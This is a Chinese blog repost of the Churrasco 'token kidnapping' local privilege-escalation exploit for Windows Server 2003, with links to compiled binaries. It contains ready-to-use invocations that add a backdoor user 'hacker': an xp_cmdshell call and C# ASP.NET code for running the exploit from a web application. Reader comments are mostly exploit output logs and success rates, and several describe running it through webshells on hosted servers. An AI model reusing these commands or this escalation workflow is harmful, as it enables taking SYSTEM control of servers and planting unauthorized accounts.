MS Windows 2003 Token Kidnapping Local Exploit PoC

鬼仔:提权很好用,直接system。文章末尾贴个TR那里的测试图。
编译好的:http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009

From:http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate. Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell ‘churrasco “net user /add hacker”‘

-Exploiting IIS 6 with ASP .NET :

System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath(“churrasco.exe”);
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= ” \”net user /add hacker\” “;
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

backup link: http://milw0rm.com/sploits/2008-Churrasco.zip

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]

图在这里:

InsomniaShell

相关日志

楼被抢了 20 层了... 抢座Rss 2.0或者 Trackback

  • 猪猪

    最让我看不懂的就是你的博客~好高深~不过想想你的技术也一定很高深了~值得请教~~~哈哈……

  • vecoe

    感觉不错

  • 人鱼姬

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 692
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 696
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 700
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 708
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x1f38
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x1f30
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • RealOne

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 788
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 792
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 800
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 808
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0xf34
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found Administrator Token
    /churrasco/–>Found Administrator Token
    /churrasco/–>Found NETWORK SERVICE Token
    /churrasco/–>Found LOCAL SERVICE Token
    /churrasco/–>Found SYSTEM token 0xf2c
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Done, command should have ran as SYSTEM!
    命令成功完成。

    楼上的RpWT!!!

  • 大鱼

    guest下测试成功,卖广告位啦啦“

  • 人鱼姬

    换了一台
    还是失败

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 816
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 220
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 676
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 820
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 824
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 832
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x1f38
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x1f30
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • zhou2222

    试了win2003 pack1 pack2版的都成功建立用户了

  • x

    菜鸟请问 这个是什么原理?

  • 人鱼姬

    第三次失败

    /churrasco/–>Current User: NETWORK SERVICE
    /churrasco/–>Getting Rpcss PID …
    /churrasco/–>Found Rpcss PID: 796
    /churrasco/–>Searching for Rpcss threads …
    /churrasco/–>Found Thread: 800
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 812
    /churrasco/–>Thread not impersonating, looking for another thread…
    /churrasco/–>Found Thread: 816
    /churrasco/–>Thread impersonating, got NETWORK SERVICE Token: 0x760
    /churrasco/–>Getting SYSTEM token from Rpcss Service…
    /churrasco/–>Found SYSTEM token 0x758
    /churrasco/–>Running command with SYSTEM Token…
    /churrasco/–>Couldn’t run command, try again!

  • 人鱼姬

    问一下大家
    你们用的是什么aspshell?
    我用的海洋,不会受这个影响吧?

  • 小C

    楼上严重人品问题.

  • 66

    我怎么测试直接没反映

  • kof2008

    昨晚测试了10多个shell 发现服务器是idc的成功率为0.学校公司的成功率还高点
    -.-#

  • love_unix

    试了两台都没有反映!!!郁闷中。。。。。

  • jjjyyy

    那个编译的版本不能用啊
    [img]http://www.jydown.cn/up/2003.jpg[/img]

  • ABC

    成功率80%以上。还有20%是因为我重复使用N次后WEBSEHLL卡死了。。。。

  • join

    这EXP还得看RP呀!我试了3个成功2个!

  • TheLostMind

    貌似我这里运行提示找不到程序入口点……

发表评论